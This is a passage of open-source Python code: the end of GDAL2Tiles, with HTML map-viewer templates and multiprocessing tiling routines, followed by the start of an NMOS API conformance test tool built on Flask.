(document.documentElement && document.documentElement.clientWidth) return document.documentElement.clientWidth; if (document.body) return document.body.clientWidth; return 0; } function resize() { var map = 
document.getElementById("map"); var header = document.getElementById("header"); var subheader = document.getElementById("subheader"); map.style.height = (getWindowHeight()-80) + "px"; map.style.width = (getWindowWidth()-20) + "px"; header.style.width = (getWindowWidth()-20) + "px"; subheader.style.width = (getWindowWidth()-20) + "px"; // map.checkResize(); } /* * Main load function: */ function load() { if (GBrowserIsCompatible()) { // Bug in the Google Maps: Copyright for Overlay is not correctly displayed var gcr = GMapType.prototype.getCopyrights; GMapType.prototype.getCopyrights = function(bounds,zoom) { return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom)); } map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } ); map.addMapType(G_PHYSICAL_MAP); map.setMapType(G_PHYSICAL_MAP); map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds )); hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] ); GEvent.addListener(map, "maptypechanged", function() { if (map.getCurrentMapType() == G_HYBRID_MAP) { map.addOverlay(hybridOverlay); } else { map.removeOverlay(hybridOverlay); } } ); var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom); var mercator = new GMercatorProjection(mapMaxZoom+1); tilelayer.getTileUrl = function(tile,zoom) { if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) { return "http://www.maptiler.org/img/none.png"; } var ymax = 1 << zoom; var y = ymax - tile.y -1; var tileBounds = new GLatLngBounds( mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ), mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom ) ); if (mapBounds.intersects(tileBounds)) { return zoom+"/"+tile.x+"/"+y+".png"; } else { return "http://www.maptiler.org/img/none.png"; } } // IE 7-: support for PNG alpha channel // Unfortunately, the opacity for whole overlay is then not changeable, either or... 
tilelayer.isPng = function() { return true;}; tilelayer.getOpacity = function() { return opacity; } overlay = new GTileLayerOverlay( tilelayer ); map.addOverlay(overlay); map.addControl(new GLargeMapControl()); map.addControl(new GHierarchicalMapTypeControl()); map.addControl(new CTransparencyControl( overlay )); """ % args # noqa if self.kml: s += """ map.addMapType(G_SATELLITE_3D_MAP); map.getEarthInstance(getEarthInstanceCB); """ s += """ map.enableContinuousZoom(); map.enableScrollWheelZoom(); map.setMapType(G_HYBRID_MAP); } resize(); } """ if self.kml: s += """ function getEarthInstanceCB(object) { var ge = object; if (ge) { var url = document.location.toString(); url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml'; var link = ge.createLink(""); if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") } else { link.setHref(url) }; var networkLink = ge.createNetworkLink(""); networkLink.setName("TMS Map Overlay"); networkLink.setFlyToView(true); networkLink.setLink(link); ge.getFeatures().appendChild(networkLink); } else { // alert("You should open a KML in Google Earth"); // add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML? } } """ % args # noqa s += """ onresize=function(){ resize(); }; //]]> </script> </head> <body onload="load()"> <div id="header"><h1>%(title)s</h1></div> <div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a> <!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU --> </div> <div id="map"></div> </body> </html> """ % args # noqa return s def generate_leaflet(self): """ Template for leaflet.html implementing overlay of tiles for 'mercator' profile. It returns filled string. 
Expected variables: title, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl """ args = {} args['title'] = self.options.title.replace('"', '\\"') args['htmltitle'] = self.options.title args['south'], args['west'], args['north'], args['east'] = self.swne args['centerlon'] = (args['north'] + args['south']) / 2. args['centerlat'] = (args['west'] + args['east']) / 2. args['minzoom'] = self.tminz args['maxzoom'] = self.tmaxz args['beginzoom'] = self.tmaxz args['tile_size'] = self.tile_size # not used args['tileformat'] = self.tileext args['publishurl'] = self.options.url # not used args['copyright'] = self.options.copyright.replace('"', '\\"') s = """<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' /> <title>%(htmltitle)s</title> <!-- Leaflet --> <link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.css" /> <script src="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.js"></script> <style> body { margin:0; padding:0; } body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; } #map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */ .ctl { padding: 2px 10px 2px 10px; background: white; background: rgba(255,255,255,0.9); box-shadow: 0 0 15px rgba(0,0,0,0.2); border-radius: 5px; text-align: right; } .title { font-size: 18pt; font-weight: bold; } .src { font-size: 10pt; } </style> </head> <body> <div id="map"></div> <script> /* **** Leaflet **** */ // Base layers // .. OpenStreetMap var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '&copy; <a href="http://osm.org/copyright">OpenStreetMap</a> contributors', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // .. 
CartoDB Positron var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '&copy; <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, &copy; <a href="http://cartodb.com/attributions">CartoDB</a>', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // .. OSM Toner var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // .. White background var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==", {minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // Overlay layers (TMS) var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s", minZoom: %(minzoom)s, maxZoom: %(maxzoom)s}); // Map var map = L.map('map', { center: [%(centerlon)s, %(centerlat)s], zoom: %(beginzoom)s, minZoom: %(minzoom)s, maxZoom: %(maxzoom)s, layers: [osm] }); var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white} var overlaymaps = {"Layer": lyr} // Title var title = L.control(); title.onAdd = function(map) { this._div = L.DomUtil.create('div', 'ctl title'); this.update(); return this._div; }; title.update = function(props) { this._div.innerHTML = "%(title)s"; }; title.addTo(map); // Note var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a 
href="http://code.google.com/soc/">GSoC</a>'; var title = L.control({position: 'bottomleft'}); title.onAdd = function(map) { this._div = L.DomUtil.create('div', 'ctl src'); this.update(); return this._div; }; title.update = function(props) { this._div.innerHTML = src; }; title.addTo(map); // Add base layers L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map); // Fit to overlay bounds (SW and NE points with (lat, lon)) map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]); </script> </body> </html> """ % args # noqa return s def generate_openlayers(self): """ Template for openlayers.html implementing overlay of available Spherical Mercator layers. It returns filled string. Expected variables: title, bingkey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl """ args = {} args['title'] = self.options.title args['bingkey'] = self.options.bingkey args['south'], args['west'], args['north'], args['east'] = self.swne args['minzoom'] = self.tminz args['maxzoom'] = self.tmaxz args['tile_size'] = self.tile_size args['tileformat'] = self.tileext args['publishurl'] = self.options.url args['copyright'] = self.options.copyright if self.options.tmscompatible: args['tmsoffset'] = "-1" else: args['tmsoffset'] = "" if self.options.profile == 'raster': args['rasterzoomlevels'] = self.tmaxz + 1 args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1] s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" <head> <title>%(title)s</title> <meta http-equiv='imagetoolbar' content='no'/> <style type="text/css"> v\:* {behavior:url(#default#VML);} html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; } body { margin: 10px; background: #fff; } h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; } #header { height: 43px; padding: 0; 
background-color: #eee; border: 1px solid #888; } #subheader { height: 12px; text-align: right; font-size: 10px; color: #555;} #map { height: 95%%; border: 1px solid #888; } .olImageLoadError { display: none; } .olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; } </style>""" % args # noqa if self.options.profile == 'mercator': s += """ <script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script> """ % args s += """ <script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script> <script> var map; var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s); var mapMinZoom = %(minzoom)s; var mapMaxZoom = %(maxzoom)s; var emptyTileURL = "http://www.maptiler.org/img/none.png"; OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3; function init(){""" % args if self.options.profile == 'mercator': s += """ var options = { div: "map", controls: [], projection: "EPSG:3857", displayProjection: new OpenLayers.Projection("EPSG:4326"), numZoomLevels: 20 }; map = new OpenLayers.Map(options); // Create Google Mercator layers var gmap = new OpenLayers.Layer.Google("Google Streets", { type: google.maps.MapTypeId.ROADMAP, sphericalMercator: true }); var gsat = new OpenLayers.Layer.Google("Google Satellite", { type: google.maps.MapTypeId.SATELLITE, sphericalMercator: true }); var ghyb = new OpenLayers.Layer.Google("Google Hybrid", { type: google.maps.MapTypeId.HYBRID, sphericalMercator: true }); var gter = new OpenLayers.Layer.Google("Google Terrain", { type: google.maps.MapTypeId.TERRAIN, sphericalMercator: true }); // Create Bing layers var broad = new OpenLayers.Layer.Bing({ name: "Bing Roads", key: "%(bingkey)s", type: "Road", sphericalMercator: true }); var baer = new OpenLayers.Layer.Bing({ name: "Bing Aerial", key: "%(bingkey)s", type: "Aerial", sphericalMercator: true }); var bhyb = new OpenLayers.Layer.Bing({ name: "Bing Hybrid", key: "%(bingkey)s", type: "AerialWithLabels", sphericalMercator: true }); // Create OSM layer var osm 
= new OpenLayers.Layer.OSM("OpenStreetMap"); // create TMS Overlay layer var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "", { serviceVersion: '.', layername: '.', alpha: true, type: '%(tileformat)s', isBaseLayer: false, getURL: getURL }); if (OpenLayers.Util.alphaHack() == false) { tmsoverlay.setOpacity(0.7); } map.addLayers([gmap, gsat, ghyb, gter, broad, baer, bhyb, osm, tmsoverlay]); var switcherControl = new OpenLayers.Control.LayerSwitcher(); map.addControl(switcherControl); switcherControl.maximizeControl(); map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection)); """ % args # noqa elif self.options.profile == 'geodetic': s += """ var options = { div: "map", controls: [], projection: "EPSG:4326" }; map = new OpenLayers.Map(options); var wms = new OpenLayers.Layer.WMS("VMap0", "http://tilecache.osgeo.org/wms-c/Basic.py?", { layers: 'basic', format: 'image/png' } ); var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "", { serviceVersion: '.', layername: '.', alpha: true, type: '%(tileformat)s', isBaseLayer: false, getURL: getURL }); if (OpenLayers.Util.alphaHack() == false) { tmsoverlay.setOpacity(0.7); } map.addLayers([wms,tmsoverlay]); var switcherControl = new OpenLayers.Control.LayerSwitcher(); map.addControl(switcherControl); switcherControl.maximizeControl(); map.zoomToExtent(mapBounds); """ % args # noqa elif self.options.profile == 'raster': s += """ var options = { div: "map", controls: [], maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s), maxResolution: %(rastermaxresolution)f, numZoomLevels: %(rasterzoomlevels)d }; map = new OpenLayers.Map(options); var layer = new OpenLayers.Layer.TMS("TMS Layer", "", { serviceVersion: '.', layername: '.', alpha: true, type: '%(tileformat)s', getURL: getURL }); map.addLayer(layer); map.zoomToExtent(mapBounds); """ % args # noqa s += """ map.addControls([new OpenLayers.Control.PanZoomBar(), new OpenLayers.Control.Navigation(), new 
OpenLayers.Control.MousePosition(), new OpenLayers.Control.ArgParser(), new OpenLayers.Control.Attribution()]); } """ % args if self.options.profile == 'mercator': s += """ function getURL(bounds) { bounds = this.adjustBounds(bounds); var res = this.getServerResolution(); var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w)); var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h)); var z = this.getServerZoom(); if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') { z+=1; } var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type; var url = this.url; if (OpenLayers.Util.isArray(url)) { url = this.selectUrl(path, url); } if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) { return url + path; } else { return emptyTileURL; } } """ % args # noqa elif self.options.profile == 'geodetic': s += """ function getURL(bounds) { bounds = this.adjustBounds(bounds); var res = this.getServerResolution(); var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w)); var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h)); var z = this.getServerZoom()%(tmsoffset)s; var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." 
+ this.type; var url = this.url; if (OpenLayers.Util.isArray(url)) { url = this.selectUrl(path, url); } if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) { return url + path; } else { return emptyTileURL; } } """ % args # noqa elif self.options.profile == 'raster': s += """ function getURL(bounds) { bounds = this.adjustBounds(bounds); var res = this.getServerResolution(); var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w)); var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h)); var z = this.getServerZoom(); var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type; var url = this.url; if (OpenLayers.Util.isArray(url)) { url = this.selectUrl(path, url); } if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) { return url + path; } else { return emptyTileURL; } } """ % args # noqa s += """ function getWindowHeight() { if (self.innerHeight) return self.innerHeight; if (document.documentElement && document.documentElement.clientHeight) return document.documentElement.clientHeight; if (document.body) return document.body.clientHeight; return 0; } function getWindowWidth() { if (self.innerWidth) return self.innerWidth; if (document.documentElement && document.documentElement.clientWidth) return document.documentElement.clientWidth; if (document.body) return document.body.clientWidth; return 0; } function resize() { var map = document.getElementById("map"); var header = document.getElementById("header"); var subheader = document.getElementById("subheader"); map.style.height = (getWindowHeight()-80) + "px"; map.style.width = (getWindowWidth()-20) + "px"; header.style.width = (getWindowWidth()-20) + "px"; subheader.style.width = (getWindowWidth()-20) + "px"; if (map.updateSize) { map.updateSize(); }; } onresize=function(){ resize(); }; </script> </head> <body onload="init()"> <div 
id="header"><h1>%(title)s</h1></div>
    <div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
    <!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
    </div>
    <div id="map"></div>
    <script type="text/javascript" >resize()</script>
    </body>
</html>""" % args  # noqa

        return s


def worker_tile_details(input_file, output_folder, options, send_pipe=None):
    """Compute the tile job configuration and per-tile details for *input_file*.

    Runs the metadata generation as a side effect.  Returns a
    (TileJobInfo, [TileDetail]) pair, and additionally sends it through
    *send_pipe* when given (used when this runs in a child process).
    """
    try:
        gdal2tiles = GDAL2Tiles(input_file, output_folder, options)
        gdal2tiles.open_input()
        gdal2tiles.generate_metadata()
        tile_job_info, tile_details = gdal2tiles.generate_base_tiles()
        return_data = (tile_job_info, tile_details)
        if send_pipe:
            send_pipe.send(return_data)
        return return_data
    except Exception as e:
        # NOTE(review): this swallows every exception and implicitly returns
        # None without sending anything on the pipe — the single-threaded
        # caller will then fail on tuple-unpacking, and the multi-process
        # parent may block forever on recv().  Consider re-raising.
        print("worker_tile_details failed ", str(e))


def progress_printer_thread(queue, nb_jobs):
    """Drain *nb_jobs* completion tokens from *queue*, updating a ProgressBar.

    NOTE(review): despite the name, multi_threaded_tiling runs this in a
    separate Process, not a Thread.
    """
    pb = ProgressBar(nb_jobs)
    pb.start()
    for _ in range(nb_jobs):
        queue.get()
        pb.log_progress()
        queue.task_done()


class ProgressBar(object):
    """Textual GDAL-style progress indicator written to stdout.

    Prints "0...10...20..." etc. in increments of STEP percent, ending with a
    newline at 100%.
    """

    def __init__(self, total_items):
        # type: (int) -> None
        self.total_items = total_items        # total units of work expected
        self.nb_items_done = 0                # units reported so far
        self.current_progress = 0             # last percentage milestone printed
        self.STEP = 2.5                       # print granularity in percent

    def start(self):
        sys.stdout.write("0")

    def log_progress(self, nb_items=1):
        """Record *nb_items* finished units and print any milestones reached."""
        self.nb_items_done += nb_items
        progress = float(self.nb_items_done) / self.total_items * 100
        if progress >= self.current_progress + self.STEP:
            done = False
            # Emit every STEP milestone passed since the last call (a single
            # large batch may cross several).
            while not done:
                if self.current_progress + self.STEP <= progress:
                    self.current_progress += self.STEP
                    if self.current_progress % 10 == 0:
                        sys.stdout.write(str(int(self.current_progress)))
                        if self.current_progress == 100:
                            sys.stdout.write("\n")
                    else:
                        sys.stdout.write(".")
                else:
                    done = True
        sys.stdout.flush()


def get_tile_swne(tile_job_info, options):
    """Return a callable (x, y, z) -> (south, west, north, east) for the profile.

    Module-level counterpart of GDAL2Tiles' self.tileswne, built from the
    picklable TileJobInfo so it can be used in worker processes.
    """
    if options.profile == 'mercator':
        mercator = GlobalMercator()
        tile_swne = mercator.TileLatLonBounds
    elif options.profile == 'geodetic':
        geodetic = GlobalGeodetic(options.tmscompatible)
        tile_swne = geodetic.TileLatLonBounds
    elif options.profile == 'raster':
        srs4326 = osr.SpatialReference()
        srs4326.ImportFromEPSG(4326)
        if tile_job_info.kml and tile_job_info.in_srs_wkt:
            in_srs = osr.SpatialReference()
            in_srs.ImportFromWkt(tile_job_info.in_srs_wkt)
            ct = osr.CoordinateTransformation(in_srs, srs4326)

            def rastertileswne(x, y, z):
                # Pixel size doubles for every level below the max zoom.
                pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1])
                west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tile_size * pixelsizex
                east = west + tile_job_info.tile_size * pixelsizex
                south = tile_job_info.ominy + y * tile_job_info.tile_size * pixelsizex
                north = south + tile_job_info.tile_size * pixelsizex
                if not tile_job_info.is_epsg_4326:
                    # Transformation to EPSG:4326 (WGS84 datum)
                    west, south = ct.TransformPoint(west, south)[:2]
                    east, north = ct.TransformPoint(east, north)[:2]
                return south, west, north, east

            tile_swne = rastertileswne
        else:
            tile_swne = lambda x, y, z: (0, 0, 0, 0)   # noqa
    else:
        tile_swne = lambda x, y, z: (0, 0, 0, 0)   # noqa

    return tile_swne


def single_threaded_tiling(input_file, output_folder, options):
    """
    Keep a single threaded version that stays clear of multiprocessing,
    for platforms that would not support it
    """
    if options.verbose:
        print("Begin tiles details calc")
    conf, tile_details = worker_tile_details(input_file, output_folder, options)

    if options.verbose:
        print("Tiles details calc complete.")

    if not options.verbose and not options.quiet:
        progress_bar = ProgressBar(len(tile_details))
        progress_bar.start()

    for tile_detail in tile_details:
        create_base_tile(conf, tile_detail)

        if not options.verbose and not options.quiet:
            progress_bar.log_progress()

    # Drop the dataset handle cached by create_base_tile on this thread.
    if getattr(threadLocal, 'cached_ds', None):
        del threadLocal.cached_ds

    create_overview_tiles(conf, output_folder, options)

    # The temporary VRT directory is no longer needed once all tiles exist.
    shutil.rmtree(os.path.dirname(conf.src_file))


def multi_threaded_tiling(input_file, output_folder, options):
    """Tile *input_file* using a pool of worker processes.

    Mirrors single_threaded_tiling but computes tile details in a child
    process and renders base tiles through a multiprocessing Pool.
    """
    nb_processes = options.nb_processes or 1

    # Make sure that all processes do not consume more than GDAL_CACHEMAX
    os.environ['GDAL_CACHEMAX'] = '%d' % int(gdal.GetCacheMax() / nb_processes)

    (conf_receiver, conf_sender) = Pipe(False)

    if options.verbose:
        print("Begin tiles details calc")
    p = Process(target=worker_tile_details,
                args=[input_file, output_folder, options],
                kwargs={"send_pipe": conf_sender})
    p.start()
    # Make sure to consume the queue before joining. If the payload is too big, it won't be put in
    # one go in the queue and therefore the sending process will never finish, waiting for space in
    # the queue to send data
    conf, tile_details = conf_receiver.recv()
    p.join()
    if options.verbose:
        print("Tiles details calc complete.")

    # Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy,
    # otherwise you can't pass it as a param in the method invoked by the pool...
    manager = Manager()
    queue = manager.Queue()
    pool = Pool(processes=nb_processes)
    # TODO: gbataille - check the confs for which each element is an array... one useless level?
    # TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..."
    for tile_detail in tile_details:
        pool.apply_async(create_base_tile, (conf, tile_detail), {"queue": queue})

    if not options.verbose and not options.quiet:
        # NOTE(review): `p` is rebound here; the details-worker Process above
        # has already been joined, so no handle is lost — but a distinct name
        # would be clearer.
        p = Process(target=progress_printer_thread, args=[queue, len(tile_details)])
        p.start()

    pool.close()
    pool.join()     # Jobs finished
    if not options.verbose and not options.quiet:
        p.join()        # Traces done

    create_overview_tiles(conf, output_folder, options)

    # The temporary VRT directory is no longer needed once all tiles exist.
    shutil.rmtree(os.path.dirname(conf.src_file))


def main():
    """Command-line entry point: parse args and dispatch to the tiling mode."""
    # TODO: gbataille - use mkdtemp to work in a temp directory
    # TODO: gbataille - debug intermediate tiles.vrt not produced anymore?
    # TODO: gbataille - Refactor generate overview tiles to not depend on self variables
    argv = gdal.GeneralCmdLineProcessor(sys.argv)
    input_file, output_folder, options = process_args(argv[1:])
    nb_processes = options.nb_processes or 1

    if nb_processes == 1:
        single_threaded_tiling(input_file, output_folder, options)
    else:
        multi_threaded_tiling(input_file, output_folder, options)


if __name__ == '__main__':
    main()

# vim: set tabstop=4 shiftwidth=4 expandtab:
nmos-test.py
# Copyright (C) 2018 Riedel Communications GmbH & Co. KG # # Modifications Copyright 2018 British Broadcasting Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from flask import Flask, render_template, flash, request, make_response from wtforms import Form, validators, StringField, SelectField, SelectMultipleField, IntegerField, HiddenField, FormField, FieldList from Registry import NUM_REGISTRIES, REGISTRIES, REGISTRY_API from GenericTest import NMOSInitException from TestResult import TestStates from Node import NODE, NODE_API from Config import CACHE_PATH, SPECIFICATIONS, ENABLE_DNS_SD, DNS_SD_MODE from DNS import DNS from datetime import datetime, timedelta from junit_xml import TestSuite, TestCase from enum import IntEnum import git import os import json import copy import pickle import threading import sys import platform import argparse import time import IS0401Test import IS0402Test import IS0403Test import IS0501Test import IS0502Test import IS0601Test import IS0701Test import IS0801Test FLASK_APPS = [] DNS_SERVER = None core_app = Flask(__name__) core_app.debug = False core_app.config['SECRET_KEY'] = 'nmos-interop-testing-jtnm' core_app.config['TEST_ACTIVE'] = False core_app.register_blueprint(NODE_API) # Dependency for IS0401Test for instance in range(NUM_REGISTRIES): reg_app = Flask(__name__) reg_app.debug = False reg_app.config['REGISTRY_INSTANCE'] = instance reg_app.register_blueprint(REGISTRY_API) # Dependency for IS0401Test FLASK_APPS.append(reg_app) # 
Definitions of each set of tests made available from the dropdowns TEST_DEFINITIONS = { "IS-04-01": { "name": "IS-04 Node API", "specs": [{ "spec_key": "is-04", "api_key": "node" }], "class": IS0401Test.IS0401Test }, "IS-04-02": { "name": "IS-04 Registry APIs", "specs": [{ "spec_key": "is-04", "api_key": "registration" }, { "spec_key": "is-04", "api_key": "query" }], "class": IS0402Test.IS0402Test }, "IS-04-03": { "name": "IS-04 Node API (Peer to Peer)", "specs": [{ "spec_key": "is-04", "api_key": "node" }], "class": IS0403Test.IS0403Test }, "IS-05-01": { "name": "IS-05 Connection Management API", "specs": [{ "spec_key": 'is-05', "api_key": "connection" }], "class": IS0501Test.IS0501Test }, "IS-05-02": { "name": "IS-05 Interaction with Node API", "specs": [{ "spec_key": "is-04", "api_key": "node" }, { "spec_key": "is-05", "api_key": "connection" }], "class": IS0502Test.IS0502Test }, "IS-06-01": { "name": "IS-06 Network Control API", "specs": [{ "spec_key": 'is-06', "api_key": "netctrl" }], "class": IS0601Test.IS0601Test }, "IS-07-01": { "name": "IS-07 Event & Tally API", "specs": [{ "spec_key": 'is-07', "api_key": "events" }], "class": IS0701Test.IS0701Test }, "IS-08-01": { "name": "IS-08 Channel Mapping API", "specs": [{ "spec_key": 'is-08', "api_key": "channelmapping" }], "class": IS0801Test.IS0801Test } } def enumerate_tests(class_def): tests = ["all", "auto"] for method_name in dir(class_def): if method_name.startswith("test_"): method = getattr(class_def, method_name) if callable(method): tests.append(method_name) return tests class NonValidatingSelectField(SelectField): def pre_validate(self, form): pass class NonValidatingMultipleSelectField(SelectMultipleField): def pre_validate(self, form): pass class EndpointForm(Form): ip = StringField(label="IP:", validators=[validators.IPAddress(message="Please enter a valid IPv4 address."), validators.optional()]) port = IntegerField(label="Port:", validators=[validators.NumberRange(min=0, max=65535, message="Please 
enter a valid port number " "(0-65535)."), validators.optional()]) version = NonValidatingSelectField(label="API Version:", choices=[("v1.0", "v1.0"), ("v1.1", "v1.1"), ("v1.2", "v1.2"), ("v1.3", "v1.3")]) class DataForm(Form): # Define the primary test selection dropdown test_choices = [(test_id, TEST_DEFINITIONS[test_id]["name"]) for test_id in TEST_DEFINITIONS] test_choices = sorted(test_choices, key=lambda x: x[0]) test = SelectField(label="Test Suite:", choices=test_choices) # Determine how many sets of IP/Port/Version to display at most specs_per_test = [(test_id, TEST_DEFINITIONS[test_id]["specs"]) for test_id in TEST_DEFINITIONS] specs_per_test = sorted(specs_per_test, key=lambda x: x[0]) max_endpoints = 0 for spec in specs_per_test: if len(spec) > max_endpoints: max_endpoints = len(spec) endpoints = FieldList(FormField(EndpointForm, label=""), min_entries=max_endpoints) # Define the secondary test selection dropdown test_selection = NonValidatingMultipleSelectField(label="Test Selection:", choices=[("all", "all"), ("auto", "auto")]) # Hide test data in the web form for dynamic modification of behaviour test_data = {} for test_id in TEST_DEFINITIONS: test_data[test_id] = copy.deepcopy(TEST_DEFINITIONS[test_id]) test_data[test_id].pop("class") test_data[test_id]["tests"] = enumerate_tests(TEST_DEFINITIONS[test_id]["class"]) hidden_options = HiddenField(default=max_endpoints) hidden_tests = HiddenField(default=json.dumps(test_data)) hidden_specs = HiddenField(default=json.dumps(SPECIFICATIONS)) # Index page @core_app.route('/', methods=["GET", "POST"]) def index_page(): form = DataForm(request.form) if request.method == "POST" and not core_app.config['TEST_ACTIVE']: if form.validate(): test = request.form["test"] try: if test in TEST_DEFINITIONS: test_def = TEST_DEFINITIONS[test] endpoints = [] for index, spec in enumerate(test_def["specs"]): ip = request.form["endpoints-{}-ip".format(index)] port = request.form["endpoints-{}-port".format(index)] version = 
request.form["endpoints-{}-version".format(index)] endpoints.append({"ip": ip, "port": port, "version": version}) test_selection = request.form.getlist("test_selection") results = run_tests(test, endpoints, test_selection) for index, result in enumerate(results["result"]): results["result"][index] = result.output() r = make_response(render_template("result.html", form=form, url=results["base_url"], test=results["name"], result=results["result"])) r.headers['Cache-Control'] = 'no-cache, no-store' return r else: flash("Error: This test definition does not exist") except Exception as e: flash("Error: {}".format(e)) else: flash("Error: {}".format(form.errors)) elif request.method == "POST": flash("Error: A test is currently in progress. Please wait until it has completed or restart the testing tool.") r = make_response(render_template("index.html", form=form)) r.headers['Cache-Control'] = 'no-cache, no-store' return r def run_tests(test, endpoints, test_selection=["all"]): if test in TEST_DEFINITIONS: test_def = TEST_DEFINITIONS[test] apis = {} for index, spec in enumerate(test_def["specs"]): base_url = "http://{}:{}".format(endpoints[index]["ip"], str(endpoints[index]["port"])) spec_key = spec["spec_key"] api_key = spec["api_key"] 